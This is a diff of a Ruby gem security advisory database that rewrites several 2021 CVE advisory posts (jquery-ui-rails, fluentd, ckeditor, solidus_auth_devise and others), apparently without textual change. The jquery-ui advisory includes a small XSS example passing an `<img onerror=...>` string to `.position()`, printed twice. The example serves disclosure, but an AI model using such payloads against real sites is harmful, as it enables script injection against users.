+    A workaround is to not accept the value of the `*Text` options from
+    untrusted sources.
+
+    ### For more information
+    If you have any questions or comments about this advisory, search
+    for a relevant issue in
+    [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues).
+    If you don't find an answer, open a new issue.
+  cvss_v2: 4.3
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 7.0.0"
+  related:
+    url:
+    - https://github.com/jquery/jquery-ui/security/advisories/GHSA-j7qv-pgf6-hvh4
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41183
+    - https://github.com/jquery/jquery-ui/pull/1953
+    - https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/
+    - https://bugs.jqueryui.com/ticket/15284
+    - https://security.netapp.com/advisory/ntap-20211118-0004/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/
+    - https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html
+    - https://www.drupal.org/sa-contrib-2022-004
+    - https://www.drupal.org/sa-core-2022-001
+    - https://www.drupal.org/sa-core-2022-002
+    - https://www.oracle.com/security-alerts/cpuapr2022.html
+    - https://www.tenable.com/security/tns-2022-09
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html
+    - https://github.com/advisories/GHSA-j7qv-pgf6-hvh4
+    - https://github.com/jquery-ui-rails/jquery-ui-rails/commit/413265e81f790f795239e07e7e25e01429b2f18d
+---
diff --git a/advisories/_posts/2021-10-26-CVE-2021-41184.md b/advisories/_posts/2021-10-26-CVE-2021-41184.md
index 351f38c3..3cea5d02 100644
--- a/advisories/_posts/2021-10-26-CVE-2021-41184.md
+++ b/advisories/_posts/2021-10-26-CVE-2021-41184.md
@@ -1,72 +1,72 @@
----
-layout: advisory
-title: 'CVE-2021-41184 (jquery-ui-rails): XSS in the `of` option of the `.position()`
-  util in jquery-ui'
-comments: false
-categories:
-- jquery-ui-rails
-advisory:
-  gem: jquery-ui-rails
-  cve: 2021-41184
-  ghsa: gpqq-952q-5327
-  url: https://github.com/jquery/jquery-ui/security/advisories/GHSA-gpqq-952q-5327
-  title: XSS in the `of` option of the `.position()` util in jquery-ui
-  date: 2021-10-26
-  description: |
-    ### Impact
-    Accepting the value of the `of` option of the
-    [`.position()`](https://api.jqueryui.com/position/)
-    util from untrusted sources may execute untrusted code. For example, invoking the
-    following code:
-    ```js
-    $("#element").position( {
-      my: "left top", at: "right bottom",
-      of: "<img onerror='doEvilThing()' src='/404' />",
-      collision: "none"
-    });
-    ```
-    will call the `doEvilThing()` function.
-
-    ### Patches
-    The issue is fixed in jQuery UI 1.13.0. Any string value passed to
-    the `of` option is now treated as a CSS selector.
-
-    ### Workarounds
-    A workaround is to not accept the value of the `of` option from
-    untrusted sources.
-
-    ### For more information
-    If you have any questions or comments about this advisory, search
-    for a relevant issue in
-    [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues).
-
-    If you don't find an answer, open a new issue."
-  cvss_v2: 4.3
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 7.0.0"
-  related:
-    url:
-    - https://github.com/jquery/jquery-ui/security/advisories/GHSA-gpqq-952q-5327
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-41184
-    - https://github.com/jquery/jquery-ui/commit/effa323f1505f2ce7a324e4f429fa9032c72f280
-    - https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/
-    - https://security.netapp.com/advisory/ntap-20211118-0004/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/
-    - https://www.drupal.org/sa-core-2022-001
-    - https://www.oracle.com/security-alerts/cpuapr2022.html
-    - https://www.tenable.com/security/tns-2022-09
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html
-    - https://github.com/advisories/GHSA-gpqq-952q-5327
-    - https://github.com/jquery-ui-rails/jquery-ui-rails/commit/413265e81f790f795239e07e7e25e01429b2f18d
----
+---
+layout: advisory
+title: 'CVE-2021-41184 (jquery-ui-rails): XSS in the `of` option of the `.position()`
+  util in jquery-ui'
+comments: false
+categories:
+- jquery-ui-rails
+advisory:
+  gem: jquery-ui-rails
+  cve: 2021-41184
+  ghsa: gpqq-952q-5327
+  url: https://github.com/jquery/jquery-ui/security/advisories/GHSA-gpqq-952q-5327
+  title: XSS in the `of` option of the `.position()` util in jquery-ui
+  date: 2021-10-26
+  description: |
+    ### Impact
+    Accepting the value of the `of` option of the
+    [`.position()`](https://api.jqueryui.com/position/)
+    util from untrusted sources may execute untrusted code. For example, invoking the
+    following code:
+    ```js
+    $("#element").position( {
+      my: "left top", at: "right bottom",
+      of: "<img onerror='doEvilThing()' src='/404' />",
+      collision: "none"
+    });
+    ```
+    will call the `doEvilThing()` function.
+
+    ### Patches
+    The issue is fixed in jQuery UI 1.13.0. Any string value passed to
+    the `of` option is now treated as a CSS selector.
+
+    ### Workarounds
+    A workaround is to not accept the value of the `of` option from
+    untrusted sources.
+
+    ### For more information
+    If you have any questions or comments about this advisory, search
+    for a relevant issue in
+    [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues).
+
+    If you don't find an answer, open a new issue."
+  cvss_v2: 4.3
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 7.0.0"
+  related:
+    url:
+    - https://github.com/jquery/jquery-ui/security/advisories/GHSA-gpqq-952q-5327
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41184
+    - https://github.com/jquery/jquery-ui/commit/effa323f1505f2ce7a324e4f429fa9032c72f280
+    - https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/
+    - https://security.netapp.com/advisory/ntap-20211118-0004/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/
+    - https://www.drupal.org/sa-core-2022-001
+    - https://www.oracle.com/security-alerts/cpuapr2022.html
+    - https://www.tenable.com/security/tns-2022-09
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html
+    - https://github.com/advisories/GHSA-gpqq-952q-5327
+    - https://github.com/jquery-ui-rails/jquery-ui-rails/commit/413265e81f790f795239e07e7e25e01429b2f18d
+---
diff --git a/advisories/_posts/2021-11-01-CVE-2021-41186.md b/advisories/_posts/2021-11-01-CVE-2021-41186.md
index 23de5f8e..a4a933ce 100644
--- a/advisories/_posts/2021-11-01-CVE-2021-41186.md
+++ b/advisories/_posts/2021-11-01-CVE-2021-41186.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2021-41186 (fluentd): ReDoS vulnerability in parser_apache2'
-comments: false
-categories:
-- fluentd
-advisory:
-  gem: fluentd
-  cve: 2021-41186
-  ghsa: hwhf-64mh-r662
-  url: https://github.com/fluent/fluentd/security/advisories/GHSA-hwhf-64mh-r662
-  title: ReDoS vulnerability in parser_apache2
-  date: 2021-11-01
-  description: |
-    ### Impact
-    parser_apache2 plugin in Fluentd v0.14.14 to v1.14.1 suffers from a regular expression denial of service (ReDoS) vulnerability. A broken apache log with a certain pattern of string can spend too much time in a regular expression, resulting in the potential for a DoS attack.
-
-    ### Patches
-    v1.14.2
-
-    ### Workarounds
-    Either of the following:
-
-    * Don't use parser_apache2 for parsing logs which cannot guarantee generated by Apache.
-    * Put patched version of parser_apache2.rb into /etc/fluent/plugin  directory (or any other directories specified by the environment variable `FLUENT_PLUGIN` or `--plugin` option of fluentd).
-  cvss_v3: 5.9
-  unaffected_versions:
-  - "< 0.14.14"
-  patched_versions:
-  - ">= 1.14.2"
-  related:
-    url:
-    - https://securitylab.github.com/advisories/GHSL-2021-102-fluent-fluentd/
-    - https://github.com/fluent/fluentd/blob/master/CHANGELOG.md#v1142
----
+---
+layout: advisory
+title: 'CVE-2021-41186 (fluentd): ReDoS vulnerability in parser_apache2'
+comments: false
+categories:
+- fluentd
+advisory:
+  gem: fluentd
+  cve: 2021-41186
+  ghsa: hwhf-64mh-r662
+  url: https://github.com/fluent/fluentd/security/advisories/GHSA-hwhf-64mh-r662
+  title: ReDoS vulnerability in parser_apache2
+  date: 2021-11-01
+  description: |
+    ### Impact
+    parser_apache2 plugin in Fluentd v0.14.14 to v1.14.1 suffers from a regular expression denial of service (ReDoS) vulnerability. A broken apache log with a certain pattern of string can spend too much time in a regular expression, resulting in the potential for a DoS attack.
+
+    ### Patches
+    v1.14.2
+
+    ### Workarounds
+    Either of the following:
+
+    * Don't use parser_apache2 for parsing logs which cannot guarantee generated by Apache.
+    * Put patched version of parser_apache2.rb into /etc/fluent/plugin  directory (or any other directories specified by the environment variable `FLUENT_PLUGIN` or `--plugin` option of fluentd).
+  cvss_v3: 5.9
+  unaffected_versions:
+  - "< 0.14.14"
+  patched_versions:
+  - ">= 1.14.2"
+  related:
+    url:
+    - https://securitylab.github.com/advisories/GHSL-2021-102-fluent-fluentd/
+    - https://github.com/fluent/fluentd/blob/master/CHANGELOG.md#v1142
+---
diff --git a/advisories/_posts/2021-11-03-CVE-2021-25973.md b/advisories/_posts/2021-11-03-CVE-2021-25973.md
index 6b035904..52177402 100644
--- a/advisories/_posts/2021-11-03-CVE-2021-25973.md
+++ b/advisories/_posts/2021-11-03-CVE-2021-25973.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2021-25973 (publify_core): Improper Authorization in Publify'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2021-25973
-  ghsa: x24j-87x9-jvv5
-  url: https://github.com/publify/publify/commit/3447e0241e921b65f6eb1090453d8ea73e98387e
-  title: Improper Authorization in Publify
-  date: 2021-11-03
-  description: |
-    In Publify, 9.0.0.pre1 to 9.2.4 are vulnerable to Improper Access Control.
-    `guest` role users can self-register even when the admin does not allow.
-    This happens due to front-end restriction only.
-  cvss_v3: 6.5
-  unaffected_versions:
-  - "< 9.0.0.pre1"
-  patched_versions:
-  - ">= 9.2.5"
-  related:
-    url:
-    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25973
----
+---
+layout: advisory
+title: 'CVE-2021-25973 (publify_core): Improper Authorization in Publify'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2021-25973
+  ghsa: x24j-87x9-jvv5
+  url: https://github.com/publify/publify/commit/3447e0241e921b65f6eb1090453d8ea73e98387e
+  title: Improper Authorization in Publify
+  date: 2021-11-03
+  description: |
+    In Publify, 9.0.0.pre1 to 9.2.4 are vulnerable to Improper Access Control.
+    `guest` role users can self-register even when the admin does not allow.
+    This happens due to front-end restriction only.
+  cvss_v3: 6.5
+  unaffected_versions:
+  - "< 9.0.0.pre1"
+  patched_versions:
+  - ">= 9.2.5"
+  related:
+    url:
+    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25973
+---
diff --git a/advisories/_posts/2021-11-15-CVE-2021-41263.md b/advisories/_posts/2021-11-15-CVE-2021-41263.md
index 3583dbe4..a798c587 100644
--- a/advisories/_posts/2021-11-15-CVE-2021-41263.md
+++ b/advisories/_posts/2021-11-15-CVE-2021-41263.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2021-41263 (rails_multisite): Secure/signed cookies share secrets between
-  sites in a multi-site application'
-comments: false
-categories:
-- rails_multisite
-advisory:
-  gem: rails_multisite
-  cve: 2021-41263
-  ghsa: 844m-cpr9-jcmh
-  url: https://github.com/discourse/rails_multisite/security/advisories/GHSA-844m-cpr9-jcmh
-  title: Secure/signed cookies share secrets between sites in a multi-site application
-  date: 2021-11-15
-  description: |
-    ### Impact
-    This vulnerability impacts any Rails applications using `rails_multisite` alongside Rails' signed/encrypted cookies. Depending on how the application makes use of these cookies, it may be possible for an attacker to re-use cookies on different 'sites' within a multi-site Rails application.
-
-    ### Patches
-    The issue has been patched in v4 of the `rails_multisite` gem. Note that this upgrade will invalidate all previous signed/encrypted cookies. The impact of this invalidation will vary based on the application architecture.
-  cvss_v3: 6.2
-  patched_versions:
-  - ">= 4.0.0"
----
+---
+layout: advisory
+title: 'CVE-2021-41263 (rails_multisite): Secure/signed cookies share secrets between
+  sites in a multi-site application'
+comments: false
+categories:
+- rails_multisite
+advisory:
+  gem: rails_multisite
+  cve: 2021-41263
+  ghsa: 844m-cpr9-jcmh
+  url: https://github.com/discourse/rails_multisite/security/advisories/GHSA-844m-cpr9-jcmh
+  title: Secure/signed cookies share secrets between sites in a multi-site application
+  date: 2021-11-15
+  description: |
+    ### Impact
+    This vulnerability impacts any Rails applications using `rails_multisite` alongside Rails' signed/encrypted cookies. Depending on how the application makes use of these cookies, it may be possible for an attacker to re-use cookies on different 'sites' within a multi-site Rails application.
+
+    ### Patches
+    The issue has been patched in v4 of the `rails_multisite` gem. Note that this upgrade will invalidate all previous signed/encrypted cookies. The impact of this invalidation will vary based on the application architecture.
+  cvss_v3: 6.2
+  patched_versions:
+  - ">= 4.0.0"
+---
diff --git a/advisories/_posts/2021-11-15-CVE-2021-41817.md b/advisories/_posts/2021-11-15-CVE-2021-41817.md
index d04fd363..27c338c5 100644
--- a/advisories/_posts/2021-11-15-CVE-2021-41817.md
+++ b/advisories/_posts/2021-11-15-CVE-2021-41817.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2021-41817 (date): Regular Expression Denial of Service Vulnerability
-  of Date Parsing Methods'
-comments: false
-categories:
-- date
-advisory:
-  gem: date
-  cve: 2021-41817
-  ghsa: qg54-694p-wgpp
-  url: https://www.ruby-lang.org/en/news/2021/11/15/date-parsing-method-regexp-dos-cve-2021-41817/
-  title: Regular Expression Denial of Service Vulnerability of Date Parsing Methods
-  date: 2021-11-15
-  description: |
-    Date's parsing methods including `Date.parse` are using Regexps internally, some of
-    which are vulnerable against regular expression denial of service. Applications and
-    libraries that apply such methods to untrusted input may be affected.
-
-    The fix limits the input length up to 128 bytes by default instead of changing the
-    regexps. This is because Date gem uses many Regexps and it is possible that there are
-    still undiscovered vulnerable Regexps. For compatibility, it is allowed to remove the
-    limitation by explicitly passing `limit` keywords as `nil` like
-    `Date.parse(str, limit: nil)`, but note that it may take a long time to parse.
-
-    Please update the date gem to version 3.2.1, 3.1.2, 3.0.2, and 2.0.1, or later.  You
-    can use `gem update date` to update it.  If you are using bundler, please add
-    `gem "date", ">= 3.2.1"` to your `Gemfile`.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.0.1"
-  - "~> 3.0.2"
-  - "~> 3.1.2"
-  - ">= 3.2.1"
----
+---
+layout: advisory
+title: 'CVE-2021-41817 (date): Regular Expression Denial of Service Vulnerability
+  of Date Parsing Methods'
+comments: false
+categories:
+- date
+advisory:
+  gem: date
+  cve: 2021-41817
+  ghsa: qg54-694p-wgpp
+  url: https://www.ruby-lang.org/en/news/2021/11/15/date-parsing-method-regexp-dos-cve-2021-41817/
+  title: Regular Expression Denial of Service Vulnerability of Date Parsing Methods
+  date: 2021-11-15
+  description: |
+    Date's parsing methods including `Date.parse` are using Regexps internally, some of
+    which are vulnerable against regular expression denial of service. Applications and
+    libraries that apply such methods to untrusted input may be affected.
+
+    The fix limits the input length up to 128 bytes by default instead of changing the
+    regexps. This is because Date gem uses many Regexps and it is possible that there are
+    still undiscovered vulnerable Regexps. For compatibility, it is allowed to remove the
+    limitation by explicitly passing `limit` keywords as `nil` like
+    `Date.parse(str, limit: nil)`, but note that it may take a long time to parse.
+
+    Please update the date gem to version 3.2.1, 3.1.2, 3.0.2, and 2.0.1, or later.  You
+    can use `gem update date` to update it.  If you are using bundler, please add
+    `gem "date", ">= 3.2.1"` to your `Gemfile`.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.0.1"
+  - "~> 3.0.2"
+  - "~> 3.1.2"
+  - ">= 3.2.1"
+---
diff --git a/advisories/_posts/2021-11-17-CVE-2021-41164.md b/advisories/_posts/2021-11-17-CVE-2021-41164.md
index ee078f98..452cb65a 100644
--- a/advisories/_posts/2021-11-17-CVE-2021-41164.md
+++ b/advisories/_posts/2021-11-17-CVE-2021-41164.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2021-41164 (ckeditor): Advanced Content Filter (ACF) vulnerability allowing
-  to execute JavaScript code using malformed HTML'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2021-41164
-  ghsa: pvmx-g8h5-cprj
-  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-pvmx-g8h5-cprj
-  title: Advanced Content Filter (ACF) vulnerability allowing to execute JavaScript
-    code using malformed HTML
-  date: 2021-11-17
-  description: |
-    ### Affected packages
-    The vulnerability has been discovered in the Advanced Content Filter (ACF) module and may affect all plugins used by CKEditor 4.
-
-    ### Impact
-    A potential vulnerability has been discovered in CKEditor 4 Advanced Content Filter (ACF) core module. The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.17.0.
-
-    ### Patches
-    The problem has been recognized and patched. The fix will be available in version 4.17.0.
-
-    ### For more information
-    Email us at security@cksource.com if you have any questions or comments about this advisory.
-
-    ### Acknowledgements
-    The CKEditor 4 team would like to thank Maurice Dauer ([laytonctf](https://twitter.com/laytonctf)) for recognizing and reporting this vulnerability.
-  cvss_v3: 8.2
-  patched_versions:
-  - ">= 5.1.2"
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-pvmx-g8h5-cprj
-    - https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-417
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-41164
-    - https://www.drupal.org/sa-core-2021-011
-    - https://www.oracle.com/security-alerts/cpujan2022.html
-    - https://www.oracle.com/security-alerts/cpuapr2022.html
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOZGMCYDB2OKKULFXZKM6V7JJW4ZZHJP/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VR76VBN5GW5QUBJFHVXRX36UZ6YTCMW6/
-    - https://github.com/advisories/GHSA-pvmx-g8h5-cprj
----
+---
+layout: advisory
+title: 'CVE-2021-41164 (ckeditor): Advanced Content Filter (ACF) vulnerability allowing
+  to execute JavaScript code using malformed HTML'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2021-41164
+  ghsa: pvmx-g8h5-cprj
+  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-pvmx-g8h5-cprj
+  title: Advanced Content Filter (ACF) vulnerability allowing to execute JavaScript
+    code using malformed HTML
+  date: 2021-11-17
+  description: |
+    ### Affected packages
+    The vulnerability has been discovered in the Advanced Content Filter (ACF) module and may affect all plugins used by CKEditor 4.
+
+    ### Impact
+    A potential vulnerability has been discovered in CKEditor 4 Advanced Content Filter (ACF) core module. The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.17.0.
+
+    ### Patches
+    The problem has been recognized and patched. The fix will be available in version 4.17.0.
+
+    ### For more information
+    Email us at security@cksource.com if you have any questions or comments about this advisory.
+
+    ### Acknowledgements
+    The CKEditor 4 team would like to thank Maurice Dauer ([laytonctf](https://twitter.com/laytonctf)) for recognizing and reporting this vulnerability.
+  cvss_v3: 8.2
+  patched_versions:
+  - ">= 5.1.2"
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-pvmx-g8h5-cprj
+    - https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-417
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41164
+    - https://www.drupal.org/sa-core-2021-011
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - https://www.oracle.com/security-alerts/cpuapr2022.html
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOZGMCYDB2OKKULFXZKM6V7JJW4ZZHJP/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VR76VBN5GW5QUBJFHVXRX36UZ6YTCMW6/
+    - https://github.com/advisories/GHSA-pvmx-g8h5-cprj
+---
diff --git a/advisories/_posts/2021-11-17-CVE-2021-41165.md b/advisories/_posts/2021-11-17-CVE-2021-41165.md
index 0825308c..f88c8307 100644
--- a/advisories/_posts/2021-11-17-CVE-2021-41165.md
+++ b/advisories/_posts/2021-11-17-CVE-2021-41165.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'CVE-2021-41165 (ckeditor): HTML comments vulnerability allowing to execute
-  JavaScript code'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2021-41165
-  ghsa: 7h26-63m7-qhf2
-  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7h26-63m7-qhf2
-  title: HTML comments vulnerability allowing to execute JavaScript code
-  date: 2021-11-17
-  description: |
-    ### Affected packages
-    The vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4.
-
-    ### Impact
-    A potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed comments HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.17.0.
-
-    ### Patches
-    The problem has been recognized and patched. The fix will be available in version 4.17.0.
-
-    ### For more information
-    Email us at security@cksource.com if you have any questions or comments about this advisory.
-
-    ### Acknowledgements
-    The CKEditor 4 team would like to thank William Bowling ([wbowling](https://github.com/wbowling)) for recognizing and reporting this vulnerability.
-  cvss_v3: 8.2
-  patched_versions:
-  - ">= 5.1.2"
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7h26-63m7-qhf2
-    - https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-417
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-41165
-    - https://www.drupal.org/sa-core-2021-011
-    - https://www.oracle.com/security-alerts/cpujan2022.html
-    - https://www.oracle.com/security-alerts/cpuapr2022.html
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-    - https://github.com/advisories/GHSA-7h26-63m7-qhf2
----
+---
+layout: advisory
+title: 'CVE-2021-41165 (ckeditor): HTML comments vulnerability allowing to execute
+  JavaScript code'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2021-41165
+  ghsa: 7h26-63m7-qhf2
+  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7h26-63m7-qhf2
+  title: HTML comments vulnerability allowing to execute JavaScript code
+  date: 2021-11-17
+  description: |
+    ### Affected packages
+    The vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4.
+
+    ### Impact
+    A potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed comments HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.17.0.
+
+    ### Patches
+    The problem has been recognized and patched. The fix will be available in version 4.17.0.
+
+    ### For more information
+    Email us at security@cksource.com if you have any questions or comments about this advisory.
+
+    ### Acknowledgements
+    The CKEditor 4 team would like to thank William Bowling ([wbowling](https://github.com/wbowling)) for recognizing and reporting this vulnerability.
+  cvss_v3: 8.2
+  patched_versions:
+  - ">= 5.1.2"
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7h26-63m7-qhf2
+    - https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-417
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41165
+    - https://www.drupal.org/sa-core-2021-011
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - https://www.oracle.com/security-alerts/cpuapr2022.html
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+    - https://github.com/advisories/GHSA-7h26-63m7-qhf2
+---
diff --git a/advisories/_posts/2021-11-18-CVE-2021-41274.md b/advisories/_posts/2021-11-18-CVE-2021-41274.md
index 549641b3..6638e480 100644
--- a/advisories/_posts/2021-11-18-CVE-2021-41274.md
+++ b/advisories/_posts/2021-11-18-CVE-2021-41274.md
@@ -1,67 +1,67 @@
----
-layout: advisory
-title: 'CVE-2021-41274 (solidus_auth_devise): Authentication Bypass by CSRF Weakness'
-comments: false
-categories:
-- solidus_auth_devise
-advisory:
-  gem: solidus_auth_devise
-  cve: 2021-41274
-  ghsa: xm34-v85h-9pg2
-  url: https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2
-  title: Authentication Bypass by CSRF Weakness
-  date: 2021-11-18
-  description: |
-    ### Impact
-    CSRF vulnerability that allows user account takeover.
-
-    All applications using any version of the frontend component of `solidus_auth_devise`
-    are affected if `protect_from_forgery` method is both:
-    - Executed whether as:
-      - A `before_action` callback (the default)
-      - A `prepend_before_action` (option `prepend: true` given) before the
-        `:load_object` hook in `Spree::UserController` (most likely order to find).
-    - Configured to use `:null_session` or `:reset_session` strategies
-      (`:null_session` is the default in case the no strategy is given, but
-      `rails --new` generated skeleton use `:exception`).
-
-    That means that applications that haven't been configured differently from
-    what it's generated with Rails aren't affected.
-
-    ### Patches
-    Users should promptly update to `solidus_auth_devise` version `2.5.4`.
-
-    ### Workarounds
-    A couple of options:
-
-    - If possible, change your strategy to `:exception`:
-      ```ruby
-      class ApplicationController < ActionController::Base
-
-         protect_from_forgery with: :exception
-      end
-      ```
-
-    - Add the following to `config/application.rb` to at least run the `:exception`
-      strategy on the affected controller:
-      ```ruby
-      config.after_initialize do
-        Spree::UsersController.protect_from_forgery
-      with: :exception
-      end
-      ```
-
-    - We've also released new Solidus versions monkey patching `solidus_auth_devise`
-      with the quick fix. Those versions are `v3.1.3`, `v.3.0.3` & `v2.11.12`. See
-      [GHSA-5629-8855-gf4g](https://github.com/solidusio/solidus/security/advisories/GHSA-5629-8855-gf4g)
-      for details.
-
-    ### References
-    - [CSRF on the Rails guides](https://guides.rubyonrails.org/security.html#cross-site-request-forgery-csrf)
-    - [Solidus security](https://solidus.io/security/)
-  cvss_v3: 9.3
-  unaffected_versions:
-  - "< 1.0.0"
-  patched_versions:
-  - ">= 2.5.4"
----
+---
+layout: advisory
+title: 'CVE-2021-41274 (solidus_auth_devise): Authentication Bypass by CSRF Weakness'
+comments: false
+categories:
+- solidus_auth_devise
+advisory:
+  gem: solidus_auth_devise
+  cve: 2021-41274
+  ghsa: xm34-v85h-9pg2
+  url: https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2
+  title: Authentication Bypass by CSRF Weakness
+  date: 2021-11-18
+  description: |
+    ### Impact
+    CSRF vulnerability that allows user account takeover.
+
+    All applications using any version of the frontend component of `solidus_auth_devise`
+    are affected if `protect_from_forgery` method is both:
+    - Executed whether as:
+      - A `before_action` callback (the default)
+      - A `prepend_before_action` (option `prepend: true` given) before the
+        `:load_object` hook in `Spree::UserController` (most likely order to find).
+    - Configured to use `:null_session` or `:reset_session` strategies
